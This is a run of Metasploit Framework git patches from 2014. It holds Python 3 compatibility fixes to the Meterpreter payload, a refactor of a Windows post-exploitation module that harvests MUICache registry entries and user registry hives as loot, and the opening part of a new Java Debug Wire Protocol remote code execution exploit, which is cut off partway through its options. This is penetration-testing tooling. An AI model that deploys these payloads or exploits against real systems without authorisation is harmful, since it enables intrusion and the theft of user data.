stdapi_registry_query_value(request, response): if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) if value_type.value == REG_SZ: - response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) elif value_type.value == REG_DWORD: value = value_data[:4] value.reverse() diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 63a3f43e8e..c206d0b8a7 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -146,7 +146,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split(NULL_BYTE, 1)[0] + val = str(val.split(NULL_BYTE, 1)[0]) elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -190,6 +190,15 @@ def tlv_pack(*args): data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data +#@export +class MeterpreterFile(object): + def __init__(self, file_obj): + self.file_obj = file_obj + + def __getattr__(self, name): + return getattr(self.file_obj, name) +export(MeterpreterFile) + #@export class MeterpreterSocket(object): def __init__(self, sock): @@ -271,6 +280,7 @@ class PythonMeterpreter(object): return func def add_channel(self, channel): + assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket))) idx = 0 while idx in self.channels: idx += 1 @@ -392,10 +402,10 @@ class PythonMeterpreter(object): if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] - if isinstance(channel, file): - channel.close() - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): channel.kill() + elif isinstance(channel, MeterpreterFile): + channel.close() elif isinstance(channel, MeterpreterSocket): channel.close() else: @@ -411,7 +421,7 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] result = False - if isinstance(channel, file): + if isinstance(channel, MeterpreterFile): result = channel.tell() >= os.fstat(channel.fileno()).st_size response += tlv_pack(TLV_TYPE_BOOL, result) return ERROR_SUCCESS, response @@ -438,13 +448,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] data = '' - if isinstance(channel, file): - data = channel.read(length) - elif isinstance(channel, STDProcess): + if isinstance(channel, STDProcess): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read(length) + elif isinstance(channel, MeterpreterFile): + data = channel.read(length) elif isinstance(channel, MeterpreterSocket): data = channel.recv(length) else: @@ -460,13 +470,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] l = len(channel_data) - if isinstance(channel, file): - channel.write(channel_data) - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response channel.stdin.write(channel_data) + elif isinstance(channel, MeterpreterFile): + channel.write(channel_data) elif isinstance(channel, MeterpreterSocket): try: l = channel.send(channel_data) @@ -487,7 +497,7 @@ class PythonMeterpreter(object): reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) resp += tlv_pack(reqid_tlv) - handler_name = str(method_tlv['value']) + handler_name = method_tlv['value'] if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: From cdabb71d233ba69c2481bbaa42eb8e8a392a3e0e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 14:51:10 -0500 Subject: [PATCH 411/853] Make code cleanup --- modules/post/windows/gather/enum_muicache.rb | 102 +++++++++---------- 1 file changed, 50 insertions(+), 52 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index f33bc63c93..e88dc57769 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -17,59 +17,58 @@ class Metasploit3 < Msf::Post 'Name' =>'Windows Gather Enum User MUICache', 'Description' => %q{ - This module gathers information about the files and file paths that - logged on users have executed on the system and it will also check - if the file still exists on the system in the file path it has been - previously executed. This information is gathered by using information - stored under the MUICache registry key. If the user is logged in when the - module is executed it will collect the MUICache entries by accessing - the registry directly. If the user is not logged in the module will - download users registry hive NTUSER.DAT/UsrClass.dat from the system - and the MUICache contents are parsed from the downloaded hive. - }, - 'License' => MSF_LICENSE, - 'Author' => ['TJ Glad <tjglad[at]cmail.nu>'], - 'Platform' => ['win'], - 'SessionType' => ['meterpreter'] - )) + This module gathers information about the files and file paths that logged on users have + executed on the system. It also will check if the file exists on the system still. This + information is gathered by using information stored under the MUICache registry key. If + the user is logged in when the module is executed it will collect the MUICache entries + by accessing the registry directly. If the user is not logged in the module will download + users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are + parsed from the downloaded hive. + }, + 'License' => MSF_LICENSE, + 'Author' => ['TJ Glad <tjglad[at]cmail.nu>'], + 'Platform' => ['win'], + 'SessionType' => ['meterpreter'] + )) end - def find_usernames() + def find_user_names() # This function scrapes usernames, sids and homepaths from the # registry so that we'll know what user accounts are on the system # and where we can find those users registry hives. - usernames = Array.new - user_homedir_paths = Array.new - user_sids = Array.new + user_names = [] + user_homedir_paths = [] + user_sids = [] username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" profile_subkeys = registry_enumkeys(username_reg_path) if profile_subkeys.blank? print_error("Unable to access ProfileList registry key. Can't continue.") return nil - else - profile_subkeys.each do |user_sid| - if user_sid.length > 10 - user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") - unless user_home_path.blank? - full_path = user_home_path.strip - usernames << full_path.split("\\").last - user_homedir_paths << full_path - user_sids << user_sid - else - print_error("Unable to read ProfileImagePath from the registry. Can't continue.") - return nil - end - end - end end - return usernames, user_homedir_paths, user_sids + + profile_subkeys.each do |user_sid| + unless user_sid.length > 10 + next + end + user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") + if user_home_path.blank? + print_error("Unable to read ProfileImagePath from the registry. Can't continue.") + return nil + end + full_path = user_home_path.strip + user_names << full_path.split("\\").last + user_homedir_paths << full_path + user_sids << user_sid + end + + return user_names, user_homedir_paths, user_sids end def enum_muicache_paths(sys_sids, mui_path) # This function builds full registry muicache paths so that we can # later enumerate the muicahe registry key contents. - user_mui_paths = Array.new + user_mui_paths = [] hive = "HKU\\" sys_sids.each do |sid| full_path = hive + sid + mui_path @@ -114,13 +113,11 @@ class Metasploit3 < Msf::Post # if it detects the executable but it should be otherwise fairly # reliable. program_path = expand_path(key) - program_exists = file_exist?(key) - if program_exists == true - exists = "File found" + if file_exist?(key) + table << [user, program_path, "File found"] else - exists = "File not found" + table << [user, program_path, "File not found"] end - table << [user, program_path, exists] end def process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) @@ -211,10 +208,10 @@ class Metasploit3 < Msf::Post return table end - def print_usernames(sys_users) + def print_user_names(sys_users) # This prints usernames pulled from the paths found from the # registry. - user_list = Array.new + user_list = [] sys_users.each do |user| user_list << user end @@ -232,14 +229,14 @@ class Metasploit3 < Msf::Post # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots print_status("Starting to enumerate MuiCache registry keys..") - sysnfo = sysinfo['OS'] + sys_info = sysinfo['OS'] - if sysnfo =~/(Windows XP)/ and is_admin? - print_good("Remote system supported: #{sysnfo}") + if sys_info =~/Windows XP/ && is_admin? + print_good("Remote system supported: #{sys_info}") muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache" hive_file = "\\NTUSER.DAT" - elsif sysnfo =~/(Windows 7)/ and is_admin? - print_good("Remote system supported: #{sysnfo}") + elsif sys_info =~/Windows 7/ && is_admin? + print_good("Remote system supported: #{sys_info}") muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" else @@ -258,12 +255,13 @@ class Metasploit3 < Msf::Post ]) print_status("Phase 1: Searching usernames..") - sys_users, sys_paths, sys_sids = find_usernames() - unless sys_users.blank? - print_usernames(sys_users) - else + sys_users, sys_paths, sys_sids = find_user_names() + + if sys_users.blank? print_error("Was not able to find any user accounts. Unable to continue.") return nil + else + print_user_names(sys_users) end print_status("Phase 2: Searching registry hives..") From 04e94b0c070cecfa6203f9b91101a2a771dbc497 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 16:42:28 -0400 Subject: [PATCH 412/853] Fix meterpreter and file tests for Python v3.4 on Win --- data/meterpreter/ext_server_stdapi.py | 43 ++++++++------------------- data/meterpreter/meterpreter.py | 6 ++-- 2 files changed, 15 insertions(+), 34 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 416e2dbc41..41b07b142c 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -49,10 +49,12 @@ except ImportError: has_winreg = False if sys.version_info[0] < 3: + is_str = lambda obj: issubclass(obj.__class__, str) is_bytes = lambda obj: issubclass(obj.__class__, str) bytes = lambda *args: str(*args[:1]) NULL_BYTE = '\x00' else: + is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) is_bytes = lambda obj: issubclass(obj.__class__, bytes) str = lambda x: __builtins__['str'](x, 'UTF-8') NULL_BYTE = bytes('\x00', 'UTF-8') @@ -546,31 +548,6 @@ def netlink_request(req_type): sock.close() return responses -def _netlink_request(req_type): - # See RFC 3549 - NLM_F_REQUEST = 0x0001 - NLM_F_ROOT = 0x0100 - NLMSG_ERROR = 0x0002 - NLMSG_DONE = 0x0003 - - sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE) - sock.bind((os.getpid(), 0)) - seq = int(time.time()) - nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) - sfd = os.fdopen(sock.fileno(), 'w+b') - sfd.write(nlmsg) - responses = [] - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) - while response.type != NLMSG_DONE: - if response.type == NLMSG_ERROR: - break - response_data = sfd.read(response.len - 16) - responses.append(response_data) - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) - sfd.close() - sock.close() - return responses - def resolve_host(hostname, family): address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0] family = address_info[0] @@ -837,7 +814,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): use = ctypes.c_ulong() use.value = 0 ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use)) - complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username) + complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username)) k32.CloseHandle(tkn_h) parch = windll_GetNativeSystemInfo() is_wow64 = ctypes.c_ubyte() @@ -846,7 +823,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)): if is_wow64.value: parch = PROCESS_ARCH_X86 - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) @@ -902,9 +879,10 @@ def stdapi_fs_delete_file(request, response): def stdapi_fs_file_expand_path(request, response): path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] if has_windll: + path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8')) path_out = (ctypes.c_char * 4096)() - path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out)) - result = ''.join(path_out)[:path_out_len] + path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out)) + result = str(ctypes.string_at(path_out)) elif path_tlv == '%COMSPEC%': result = '/bin/sh' elif path_tlv in ['%TEMP%', '%TMP%']: @@ -1011,7 +989,7 @@ def stdapi_fs_stat(request, response): @meterpreter.register_function def stdapi_net_config_get_interfaces(request, response): - if hasattr(socket, 'AF_NETLINK'): + if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'): interfaces = stdapi_net_config_get_interfaces_via_netlink() elif has_osxsc: interfaces = stdapi_net_config_get_interfaces_via_osxsc() @@ -1184,7 +1162,10 @@ def stdapi_net_config_get_interfaces_via_windll(): iface_info['index'] = AdapterAddresses.u.s.IfIndex if AdapterAddresses.PhysicalAddressLength: iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength) - iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description)) + iface_desc = ctypes.wstring_at(AdapterAddresses.Description) + if not is_str(iface_desc): + iface_desc = str(iface_desc) + iface_info['name'] = iface_desc iface_info['mtu'] = AdapterAddresses.Mtu pUniAddr = AdapterAddresses.FirstUnicastAddress while pUniAddr: diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index c206d0b8a7..7bc733cfc5 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -502,17 +502,17 @@ class PythonMeterpreter(object): handler = self.extension_functions[handler_name] try: if DEBUGGING: - print("[*] running method {0}".format(handler_name)) + print('[*] running method ' + handler_name) result, resp = handler(request, resp) except Exception: if DEBUGGING: - print("[-] method {0} resulted in an error".format(handler_name)) + print('[-] method ' + handler_name + ' resulted in an error') exc_type, exc_value, exc_traceback = sys.exc_info() traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr) result = ERROR_FAILURE else: if DEBUGGING: - print("[-] method {0} was requested but does not exist".format(handler_name)) + print('[-] method ' + handler_name + ' was requested but does not exist') result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp From cbbd7bfdf4e1c5cfab0e212fda2f754db92d2ec6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 15:55:44 -0500 Subject: [PATCH 413/853] Refacotor code --- modules/post/windows/gather/enum_muicache.rb | 252 ++++++++++--------- 1 file changed, 130 insertions(+), 122 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index e88dc57769..aeada12240 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -32,10 +32,10 @@ class Metasploit3 < Msf::Post )) end - def find_user_names() - # This function scrapes usernames, sids and homepaths from the - # registry so that we'll know what user accounts are on the system - # and where we can find those users registry hives. + # Scrapes usernames, sids and homepaths from the registry so that we'll know + # what user accounts are on the system and where we can find those users + # registry hives. + def find_user_names user_names = [] user_homedir_paths = [] user_sids = [] @@ -65,169 +65,174 @@ class Metasploit3 < Msf::Post return user_names, user_homedir_paths, user_sids end + # This function builds full registry muicache paths so that we can + # later enumerate the muicahe registry key contents. def enum_muicache_paths(sys_sids, mui_path) - # This function builds full registry muicache paths so that we can - # later enumerate the muicahe registry key contents. user_mui_paths = [] hive = "HKU\\" + sys_sids.each do |sid| full_path = hive + sid + mui_path user_mui_paths << full_path end - return user_mui_paths + + user_mui_paths end - def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table) - # This is the main enumeration function that calls other main - # functions depending if we can access the registry directly or if - # we need to download the hive and process it locally. + # This is the main enumeration function that calls other main + # functions depending if we can access the registry directly or if + # we need to download the hive and process it locally. + def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) + results = [] + loot_path = Msf::Config::loot_directory all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths) + all_user_entries.each do |user, reg_key, sys_path| local_hive_copy = ::File.join(loot_path, "#{sysinfo['Computer']}_#{user}_HIVE_#{::Time.now.utc.strftime('%Y%m%d.%M%S')}") subkeys = registry_enumvals(reg_key) - unless subkeys.blank? + if subkeys.blank? + # If the registry_enumvals returns us nothing then we'll know + # that the user is most likely not logged in and we'll need to + # download and process users hive locally. + print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + results = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) || [] + else # If the registry_enumvals returns us content we'll know that we # can access the registry directly and thus continue to process # the content collected from there. print_status("User #{user}: Enumerating registry..") subkeys.each do |key| if key[0] != "@" and key != "LangID" and not key.nil? - check_file_exists(key, user, table) + result = check_file_exists(key, user) + results << result unless result.nil? end end - else - # If the registry_enumvals returns us nothing then we'll know - # that the user is most likely not logged in and we'll need to - # download and process users hive locally. - print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") - process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) end end - return table + + results end - def check_file_exists(key, user, table) - # This function will check if it can find the program executable - # from the path it found from the registry. Permissions might affect - # if it detects the executable but it should be otherwise fairly - # reliable. + # This function will check if it can find the program executable + # from the path it found from the registry. Permissions might affect + # if it detects the executable but it should be otherwise fairly + # reliable. + def check_file_exists(key, user) program_path = expand_path(key) if file_exist?(key) - table << [user, program_path, "File found"] + return [user, program_path, "File found"] else - table << [user, program_path, "File not found"] + return [user, program_path, "File not found"] end end - def process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) - # This function will check if the filepath contains a registry hive - # and if it does it'll proceed to call the function responsible of - # downloading the hive. After successfull download it'll continue to - # call the hive_parser function which will extract the contents of - # the MUICache registry key. + # This function will check if the filepath contains a registry hive + # and if it does it'll proceed to call the function responsible of + # downloading the hive. After successfull download it'll continue to + # call the hive_parser function which will extract the contents of + # the MUICache registry key. + def process_hive(sys_path, user, local_hive_copy, muicache, hive_file) user_home_path = expand_path(sys_path) hive_path = user_home_path + hive_file - ntuser_status = client.fs.file.exists?(hive_path) - if ntuser_status == true - print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") - hive_status = hive_download_status(local_hive_copy, hive_path) - if hive_status == true - hive_parser(local_hive_copy, muicache, user, table) - else - print_error("All registry hive download attempts failed. Unable to continue.") - return nil - end - else + ntuser_status = file_exist?(hive_path) + + unless ntuser_status == true print_error("Couldn't locate/download #{user}'s registry hive. Can't proceed.") return nil end - end - def hive_download_status(local_hive_copy, hive_path) - # This function downloads registry hives and checks for integrity - # after the transfer has completed so that we don't end up - # processing broken registry hive. - hive_status = false - 3.times do - remote_hive_hash_raw = client.fs.file.md5(hive_path) - unless remote_hive_hash_raw.blank? - remote_hive_hash = remote_hive_hash_raw.unpack('H*') - session.fs.file.download_file(local_hive_copy, hive_path) - local_hive_hash = file_local_digestmd5(local_hive_copy) - if local_hive_hash == remote_hive_hash[0] - print_good("Hive downloaded successfully.") - hive_status = true - break - else - print_error("Hive download corrupted, trying again (max 3 times)..") - File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made - hive_status = false - end - end + print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") + hive_status = hive_download_status(local_hive_copy, hive_path) + + unless hive_status == true + print_error("All registry hive download attempts failed. Unable to continue.") + return nil end - return hive_status + + hive_parser(local_hive_copy, muicache, user) end - def hive_parser(local_hive_copy, muicache, user, table) - # This function is responsible for parsing the downloaded hive and - # extracting the contents of the MUICache registry key. - print_status("Phase 3: Parsing registry content..") + # This function downloads registry hives and checks for integrity + # after the transfer has completed so that we don't end up + # processing broken registry hive. + def hive_download_status(local_hive_copy, hive_path) + hive_status = false + + 3.times do + remote_hive_hash_raw = file_remote_digestmd5(hive_path) + if remote_hive_hash_raw.blank? + next + end + + remote_hive_hash = remote_hive_hash_raw.unpack('H*') + session.fs.file.download_file(local_hive_copy, hive_path) + local_hive_hash = file_local_digestmd5(local_hive_copy) + if local_hive_hash == remote_hive_hash[0] + print_good("Hive downloaded successfully.") + hive_status = true + break + else + print_error("Hive download corrupted, trying again (max 3 times)..") + File.delete(local_hive_copy) # Downloaded corrupt hive gets deleted before new attempt is made + hive_status = false + end + + end + + hive_status + end + + # This function is responsible for parsing the downloaded hive and + # extracting the contents of the MUICache registry key. + def hive_parser(local_hive_copy, muicache, user) + results = [] + print_status("Parsing registry content..") err_msg = "Error parsing hive. Can't continue." hive = Rex::Registry::Hive.new(local_hive_copy) if hive.nil? print_error(err_msg) return nil - else - muicache_key = hive.relative_query(muicache) - if muicache_key.nil? - print_error(err_msg) - return nil - else - muicache_key_value_list = muicache_key.value_list - if muicache_key_value_list.nil? - print_error(err_msg) - return nil - else - muicache_key_values = muicache_key_value_list.values - if muicache_key_values.nil? - print_error(err_msg) - return nil - else - muicache_key_values.each do |value| - key = value.name - if key[0] != "@" and key != "LangID" and not key.nil? - check_file_exists(key, user, table) - end - end - end - end + end + + muicache_key = hive.relative_query(muicache) + if muicache_key.nil? + print_error(err_msg) + return nil + end + + muicache_key_value_list = muicache_key.value_list + if muicache_key_value_list.nil? + print_error(err_msg) + return nil + end + + muicache_key_values = muicache_key_value_list.values + if muicache_key_values.nil? + print_error(err_msg) + return nil + end + + muicache_key_values.each do |value| + key = value.name + if key[0] != "@" and key != "LangID" and not key.nil? + result = check_file_exists(key, user) + results << result unless result.nil? end end + File.delete(local_hive_copy) # Downloaded hive gets deleted after processing - return table - end - - def print_user_names(sys_users) - # This prints usernames pulled from the paths found from the - # registry. - user_list = [] - sys_users.each do |user| - user_list << user - end - users = user_list.join(", ") - print_good("Found users: #{users}") + + results end + # Information about the MUICache registry key was collected from: + # + # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey + # - Windows Registry Forensics / 2011 / Harlan Carvey + # - http://forensicartifacts.com/2010/08/registry-muicache/ + # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots def run - - # Information about the MUICache registry key was collected from: - # - # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey - # - Windows Registry Forensics / 2011 / Harlan Carvey - # - http://forensicartifacts.com/2010/08/registry-muicache/ - # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots - print_status("Starting to enumerate MuiCache registry keys..") sys_info = sysinfo['OS'] @@ -254,24 +259,27 @@ class Metasploit3 < Msf::Post "File status", ]) - print_status("Phase 1: Searching usernames..") - sys_users, sys_paths, sys_sids = find_user_names() + print_status("Phase 1: Searching user names..") + sys_users, sys_paths, sys_sids = find_user_names if sys_users.blank? print_error("Was not able to find any user accounts. Unable to continue.") return nil else - print_user_names(sys_users) + print_good("Users found: #{sys_users.join(", ")}") end print_status("Phase 2: Searching registry hives..") muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) - results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table).to_s + results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) - print_status("Phase 4: Processing results..") - loot = store_loot("muicache_info", "text/plain", session, results, nil, "MUICache Information") - print_line("\n" + results + "\n") + results.each { |r| table << r } + + print_status("Phase 3: Processing results..") + loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information") + print_line("\n" + table.to_s + "\n") print_status("Results stored in: #{loot}") print_status("Execution finished.") end + end From 95b71dee00ce9ddc09099e71a48dedabc93cf2e7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 16:12:51 -0500 Subject: [PATCH 414/853] Try to fix crash while file_remote_digest --- modules/post/windows/gather/enum_muicache.rb | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index aeada12240..bd3fa53ec3 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -96,7 +96,12 @@ class Metasploit3 < Msf::Post # that the user is most likely not logged in and we'll need to # download and process users hive locally. print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") - results = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) || [] + result = process_hive(sys_path, user, local_hive_copy, muicache, hive_file) + unless result.nil? + result.each { |r| + results << r unless r.nil? + } + end else # If the registry_enumvals returns us content we'll know that we # can access the registry directly and thus continue to process @@ -160,7 +165,12 @@ class Metasploit3 < Msf::Post hive_status = false 3.times do - remote_hive_hash_raw = file_remote_digestmd5(hive_path) + begin + remote_hive_hash_raw = file_remote_digestmd5(hive_path) + rescue EOFError, ::Rex::Post::Meterpreter::RequestError + next + end + if remote_hive_hash_raw.blank? next end From 9627bae98b8594a2985a9bbe90869bf627f752bd Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Thu, 29 May 2014 23:45:44 +0200 Subject: [PATCH 415/853] Add JDWP RCE for Windows and Linux --- .../exploits/multi/misc/java_jdwp_debugger.rb | 969 ++++++++++++++++++ 1 file changed, 969 insertions(+) create mode 100755 modules/exploits/multi/misc/java_jdwp_debugger.rb diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb new file mode 100755 index 0000000000..dd0be92a3b --- /dev/null +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -0,0 +1,969 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CheckCode + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + + HANDSHAKE = "JDWP-Handshake" + + REQUEST_PACKET_TYPE = 0x00 + REPLY_PACKET_TYPE = 0x80 + + # Command signatures + VERSION_SIG = [1, 1] + CLASSESBYSIGNATURE_SIG = [1, 2] + ALLCLASSES_SIG = [1, 3] + ALLTHREADS_SIG = [1, 4] + IDSIZES_SIG = [1, 7] + CREATESTRING_SIG = [1, 11] + SUSPENDVM_SIG = [1, 8] + RESUMEVM_SIG = [1, 9] + SIGNATURE_SIG = [2, 1] + FIELDS_SIG = [2, 4] + METHODS_SIG = [2, 5] + GETVALUES_SIG = [2, 6] + CLASSOBJECT_SIG = [2, 11] + INVOKESTATICMETHOD_SIG = [3, 3] + CREATENEWINSTANCE_SIG = [3, 4] + REFERENCETYPE_SIG = [9, 1] + INVOKEMETHOD_SIG = [9, 6] + STRINGVALUE_SIG = [10, 1] + THREADNAME_SIG = [11, 1] + THREADSUSPEND_SIG = [11, 2] + THREADRESUME_SIG = [11, 3] + THREADSTATUS_SIG = [11, 4] + EVENTSET_SIG = [15, 1] + EVENTCLEAR_SIG = [15, 2] + EVENTCLEARALL_SIG = [15, 3] + + # Other codes + MODKIND_COUNT = 1 + MODKIND_THREADONLY = 2 + MODKIND_CLASSMATCH = 5 + MODKIND_LOCATIONONLY = 7 + EVENT_BREAKPOINT = 2 + SUSPEND_EVENTTHREAD = 1 + SUSPEND_ALL = 2 + NOT_IMPLEMENTED = 99 + VM_DEAD = 112 + INVOKE_SINGLE_THREADED = 2 + TAG_OBJECT = 76 + TAG_STRING = 115 + TYPE_CLASS = 1 + TAG_ARRAY = 91 + TAG_VOID = 86 + + + def initialize + super( + 'Name' => 'Java Debugging Wire Protocol Scanner', + 'Description' => %q{ + This module abuses exposed Java Debugging Wire Protocol services in order + to execute code remotely. + }, + 'Author' => [ + + 'Christophe Alladoum', # Exploit + 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module + ], + 'References' => + [ + ['http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'], + ['http://www.exploit-db.com/papers/27179/'], + ['https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], + ['http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] + ], + 'DisclosureDate' => 'May 29 2014', + 'License' => MSF_LICENSE, + 'Platform' => %w{ linux win }, + 'Privileged' => true, + 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ] + ], + 'DefaultTarget' => 1 + ) + + register_options( + [ + Opt::RPORT(8000), + OptInt.new('STATUS_EVERY', [true, 'How many iterations until status', 1000]), + OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), + OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Ensure there is a trailing slash', nil]) + ], self.class) + + register_advanced_options( + [ + OptString.new('BREAK_CLASS', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), + 